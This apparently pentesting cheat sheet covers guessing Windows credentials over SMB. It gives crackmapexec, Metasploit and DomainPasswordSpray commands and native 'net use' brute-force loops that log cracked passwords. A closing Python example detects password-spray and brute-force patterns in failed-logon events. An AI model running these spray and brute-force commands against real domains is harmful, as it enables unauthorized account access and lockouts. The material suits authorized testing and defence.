Use the SMB service to guess Windows-related credentials. This is especially useful in an Active Directory environment.

Check Credentials

crackmapexec [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]

Result        Description
[+] PWNED     Valid credentials and local administrator
[+] green     Valid credentials
[-] red       Invalid credentials (or other error)

With working credentials you should get an smb: \> prompt. To authenticate with a null session, do not specify any username and leave the password blank, or add the -N flag.

Password Spray

Always be careful about account lockout when performing password spray attacks in an Active Directory environment. See the user enumeration techniques to get the list of all AD users and their failed password attempt counts.

while read -r user; do crackmapexec [HOST] -u "$user" -p [PASSWORD] -d [DOMAIN]; done < users.txt

All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.

Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS [HOST]
set USER_FILE [USERS.txt]
set SMBDomain [DOMAIN]
set SMBPass [PASSWORD]
run

All valid users will be automatically saved to the workspace creds database.

PowerShell - DomainPasswordSpray.ps1

Automates the whole user enumeration and password spray process when run from within the domain.

Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.

Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]

Of course, the user list and domain name can also be specified manually.

Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]


Brute Force

Native Windows - net use
for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause

Alternatively, we could append our result to a file:

for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]
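The lockout caveat in the password spray section, the observation-window note on DomainPasswordSpray, and the single-account net use loop above all leave the same trace on the domain side: failed logons (Windows Security event 4625) that either fan out across many accounts from one source or pile up against one account until the lockout threshold is hit. The following Python is an added example, not part of this cheat sheet or of any of the tools it lists, that detects both shapes in such records. The sample events, the lockout policy values (threshold 5, 30-minute observation window) and the spray threshold of 10 distinct accounts are constructed assumptions; real values come from the domain policy and the actual event log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon records, modelled on the fields a Windows
# Security event 4625 carries (time, target account, source address). This is
# not real log data.
SAMPLE_EVENTS = (
    # spray pattern: one source, a single attempt against each of 12 accounts
    [(f"2024-01-15T09:00:{i:02d}", f"user{i:02d}", "10.0.0.5") for i in range(12)]
    # single-account brute force: one source, six attempts against "carol"
    + [(f"2024-01-15T09:1{i // 2}:{30 * (i % 2):02d}", "carol", "10.0.0.9") for i in range(6)]
    # benign noise: one failure from a workstation
    + [("2024-01-15T09:20:00", "dave", "10.0.0.7")]
)

# Assumed lockout policy values; read the real ones from the domain policy.
LOCKOUT_THRESHOLD = 5
OBSERVATION_WINDOW = timedelta(minutes=30)


def parse_events(raw):
    """Turn (iso-timestamp, account, source) triples into (datetime, account, source)."""
    return [(datetime.fromisoformat(ts), user.lower(), src) for ts, user, src in raw]


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def lockout_risk(events, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
    """Accounts whose failures inside one observation window reach the lockout threshold."""
    by_user = defaultdict(list)
    for ts, user, _ in events:
        by_user[user].append(ts)
    hits = {user: max_in_window(ts, window) for user, ts in by_user.items()}
    return {user: n for user, n in hits.items() if n >= threshold}


def spray_sources(events, min_accounts=10, window=OBSERVATION_WINDOW):
    """Sources that failed against at least `min_accounts` distinct accounts within one window."""
    by_source = defaultdict(list)
    for ts, user, src in events:
        by_source[src].append((ts, user))
    flagged = {}
    for src, attempts in by_source.items():
        attempts.sort()
        best, start = 0, 0
        for end in range(len(attempts)):
            # slide the window start forward until it fits inside `window`
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            distinct = len({user for _, user in attempts[start:end + 1]})
            best = max(best, distinct)
        if best >= min_accounts:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("spray sources:", spray_sources(events))
    print("lockout risk :", lockout_risk(events))
```

The two detectors are deliberately separate: a spray keeps every account under the lockout threshold, so per-account counting alone never sees it, while the per-source distinct-account count is blind to a patient brute force against one user. Running both over the same events is what turns the lockout policy from a tripwire the attacker is trying to stay under into a signal.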